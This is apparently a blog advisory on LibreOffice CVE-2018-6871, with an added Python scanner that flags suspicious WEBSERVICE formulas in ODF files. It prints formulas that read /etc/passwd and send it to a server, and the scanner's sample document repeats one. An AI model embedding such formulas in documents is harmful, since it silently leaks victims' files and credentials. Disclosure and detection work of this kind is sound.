LibreOffice contains a Remote Arbitrary File Disclosure vulnerability (CVE-2018-6871) that allows attackers to send files to the Internet using specially prepared spreadsheet documents. This Remote Arbitrary File Disclosure vulnerability has been closed in LibreOffice 5.4.5/6.0.1.
LibreOffice 6.0 has just been released. It is a free alternative to Microsoft Office that runs on several operating system platforms (Linux, macOS and Windows). Blog reader Ralf H. informed me by e-mail during the night about a Remote Arbitrary File Disclosure vulnerability (CVE-2018-6871) in LibreOffice (thanks for that). There are now also posts at Hacker News, securelist.org and reddit.com.
Remote Arbitrary File Disclosure (CVE-2018-6871)
LibreOffice supports the function COM.MICROSOFT.WEBSERVICE from Microsoft Office. A description of the feature available in Microsoft Excel 2013 and 2016 can be found on this Microsoft page. The purpose of this function in Excel is to retrieve data from a Web service on the Internet or intranet. To do this, you only need to pass the URL of the resource from the Internet/intranet as a parameter to the function.
=WEBSERVICE("http://mywebservice.com/serviceEndpoint?searchString=Excel")
Here is an example:
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")
Microsoft implemented a significant limitation within this function:
For protocols that are not supported, such as ftp:// or file://, WEBSERVICE returns the #VALUE! error value.
In LibreOffice these restrictions were unfortunately not implemented before version 5.4.5/6.0.1. By default, the cells in LibreOffice Calc are not updated. However, if you specify a cell type such as ~error, the cell is updated when you open the document. This makes it possible to send files out through this vulnerability, as @jollheef (Mikhail Klementev, seccomp.ru) explained on GitHub. To read a file locally, you could use the following statement in LibreOffice Calc:
=WEBSERVICE("/etc/passwd")
Then the following statement is sufficient to read and send a file to an Internet server:
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))
A Calc table can also be embedded in documents of other LibreOffice modules. In that case, too, CVE-2018-6871 allows any file to be read and sent to the Internet.
So it is relatively easy to send arbitrary files with keys, passwords and everything else. The success rate is 100%, and the whole thing happens invisibly in the background: the user doesn't notice anything. All it takes is a prepared file with the manipulated Calc table. The exploit or proof of concept by @jollheef works in all LibreOffice versions prior to 5.4.5/6.0.1 and on all operating systems (GNU/Linux, MS Windows, macOS etc.). The manipulated Calc table can be embedded in almost all formats supported by LO.
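A defender's check for the formulas shown above, as an added example that is not from the original post, from @jollheef or from LibreOffice: it scans every content.xml inside an ODF file (main document and embedded Calc objects) for WEBSERVICE calls with a non-http(s) target or with one call nested in another. The function names, the constructed sample document and the assumption that formulas sit in the table:formula attribute are illustrative.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET  # for hostile input, prefer a hardened parser

NS = "urn:oasis:names:tc:opendocument:xmlns:table:1.0"
FORMULA = "{%s}formula" % NS
# WEBSERVICE( optionally followed by a string literal as its first argument
CALL = re.compile(r'WEBSERVICE\s*\(\s*(?:"([^"]*)")?', re.I)

def classify(formula):
    """Return the reasons a formula is suspicious (empty list if none)."""
    calls = CALL.findall(formula)
    # Fixed versions only accept http/https; any other literal is a local read.
    reasons = ["non-http target: " + arg for arg in calls
               if arg and not re.match(r"https?://", arg, re.I)]
    if len(calls) > 1:
        reasons.append("nested WEBSERVICE (one call's result fed into another)")
    return reasons

def scan_odf(data):
    """Scan all content.xml members of an ODF zip given as bytes."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith("content.xml"):
                continue
            for el in ET.fromstring(z.read(name)).iter():
                formula = el.get(FORMULA)
                reasons = classify(formula) if formula else []
                if reasons:
                    hits.append((name, formula, reasons))
    return hits

def make_sample(formulas, member="content.xml"):
    """Build a constructed, minimal ODF-like zip holding the given formulas."""
    root = ET.Element("{%s}table" % NS)
    for f in formulas:
        ET.SubElement(root, "{%s}table-cell" % NS, {FORMULA: f})
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(member, ET.tostring(root))
    return buf.getvalue()

if __name__ == "__main__":
    # Constructed sample: the page's two-stage formula inside an embedded object.
    sample = make_sample([
        'of:=COM.MICROSOFT.WEBSERVICE("http://localhost:6000/?q="'
        '&COM.MICROSOFT.WEBSERVICE("/etc/passwd"))',
        'of:=COM.MICROSOFT.WEBSERVICE("https://example.com/api")',
    ], member="Object 1/content.xml")
    for name, formula, reasons in scan_odf(sample):
        print(name, formula, reasons)
```

A target supplied through a cell reference instead of a string literal is not resolved by this check; only the nesting rule would catch it.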
Bugs known and fixed in LibreOffice
The LibreOffice developers are aware of the error. It was published yesterday on this LibreOffice page. The problem has been solved in LibreOffice versions 5.4.5/6.0.1. The WEBSERVICE function has now been restricted to accessing http and https URLs, and WEBSERVICE URLs have been placed under the link management infrastructure of LibreOffice Calc. So switch to LibreOffice versions 5.4.5/6.0.1 or higher as soon as possible.